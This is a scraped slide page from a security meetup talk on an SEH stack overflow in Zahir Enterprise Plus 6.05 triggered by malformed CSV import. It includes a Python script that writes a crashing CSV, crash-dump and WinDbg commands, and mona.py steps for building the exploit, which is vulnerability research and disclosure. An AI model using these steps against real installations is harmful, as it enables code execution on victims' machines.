Blinded Stack Overflow: Just Another Common Technique
1 like323 views
This document summarizes a presentation about exploiting a vulnerability in Zahir Enterprise plus 6.05 desktop application. The researchers identified that the application could crash when opening malformed CSV files, and used fuzzing and crash analysis to develop a remote code execution exploit. They were able to bypass anti-debugging protections and hijack the structured exception handler to redirect execution to shellcode injected in the CSV file. The vulnerability was reported to the vendor but no fix was provided.
![Simple code to crash10
#!/usr/bin/python
junk = "A" * 2500
junk += 'nr’ # this is the CR/LF
junk += 'A' * 500
junk += "D" * 500
print "[+] Preparing for file.."
filename = "junk.csv"
f = open(filename, 'w')
print "[+] Writing crafted CSV file.."
f.write(junk)
f.close()
print "[+] File %s written successfully.. bring it to Mr. Zahir." %filename](https://image.slidesharecdn.com/blindedstackoverflow-idbughuntermeetup1-180928193646/85/Blinded-Stack-Overflow-Just-Another-Common-Technique-10-320.jpg)
Ad
More Related Content
Similar to Blinded Stack Overflow: Just Another Common Technique (20)
Recently uploaded (20)
Ad
Blinded Stack Overflow: Just Another Common Technique
- 1. Blinded Stack Overflow Exploit: Just Another Common Technique Thomas Gregory | Director and Partner at PT Spentera [email protected] | @modpr0be Indonesian Bug Hunter Lounge Meetup 2018
- 2. Who we are2 • Marie Muhammad • Security researcher • Penetration tester and Red team operator • Bug hunter • Hold OSCP, OSCE, CRTE • [email protected] • @f3ci • Found the 0day • Thomas Gregory • Director and Partner at Spentera • Cybersecurity Consultant • Vulnerability Discovery and 0day Exploit Development • Vulnerability Assessment and Penetration Testing • Metasploit framework exploit developer • Hold OSCP, OSCE, ISO 27001:2013 LA • [email protected] • @modpr0be • Just exploiting further
- 3. Agenda3
- 4. What4
- 5. Zahir Enterprise plus 6.05
- 6. Why6
- 7. How7
- 8. Fuzzing: Identifying Entry point8 • Zahir is a desktop client application, one of the identifying entry point approach is file format fuzzing. • Identifying entry points: • Menu Buka Data, a function to read from a local database or Firebird database. • Menu Membuka File Backup, a function to open an existing backup • Menu Import Data dari Zahir versi 6.0, a menu to open data from previous Zahir version. • Menu Import Data dari file lainnya, a menu to open data from CSV format file. • Menu Import Transaksi, a menu to open data from CSV format file.
- 10. Simple code to crash10 #!/usr/bin/python junk = "A" * 2500 junk += 'nr’ # this is the CR/LF junk += 'A' * 500 junk += "D" * 500 print "[+] Preparing for file.." filename = "junk.csv" f = open(filename, 'w') print "[+] Writing crafted CSV file.." f.write(junk) f.close() print "[+] File %s written successfully.. bring it to Mr. Zahir." %filename
- 12. Exception Handler Kicked in12
- 13. Replicate and Debug the app13
- 14. Failed: Anti debug implemented14
- 15. At this point15 Modify the main program to bypass the anti-debug function Catch and dump the crash info ! Analysis the crash dump
- 17. Catch the crash with procdump17 mkdir c:crashdump cd C:toolsSysinternalsSuite procdump.exe -ma -I C:crashdump
- 18. Analysis the crash with windbg18 File – Open Crash Dump
- 19. Analysis the crash with windbg19 0:000> d 0012ec30 0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0:000> !exchain
- 20. How SEH works20 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------+ +----------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler| +------------------------------+ +--------+ +----------+ +--------+ +----------+ Junk / buffer ^ | | | | | +-----------+ (2) SE Handler membawa kembali ke alamat SEH berikutnya
- 21. How SEH exploit works21 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------------------------------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D| +------------------------------+ +--------+ +----------+ +--------------------------------+ Junk / buffer ^ | Shellcode | |POP REG | |POP REG | |RETN | | +-----------+(2) POP POP RET membawa kembali ke next SEH
- 22. Mona help during the exploit development22 # Load mona.py into WinDBG 0:000> .load pykd.pyd # Same as Metasploit pattern_create.rb and pattern_offset.rb 0:000> !py mona pc 0:000> !py mona po <offset> # Compare memory for bad characters 0:000> !py mona ba -cpb ‘x00’ 0:000> !py mona cmp -f bytearray.bin -a <start address>
- 23. Exploit FTW! Demo exploitation process.. 23
- 24. aftermath • Mitigation • Don't process files with CSV extension from untrusted parties, • Double check if trusted parties provide files with CSV extension, • Always update the operating system and your endpoint security. • Solution • There is no solution from Zahir at the moment. • Vulnerability report • Zahir was contacted but no security related response. • Submitted to National Cyber Security Operation Center under Indonesia National Cyber and Encryption Agency (BSSN) • Assigned CVE 2018-17408 24
- 25. Thank you Thomas Gregory Director and Partner at PT Spentera [email protected] 25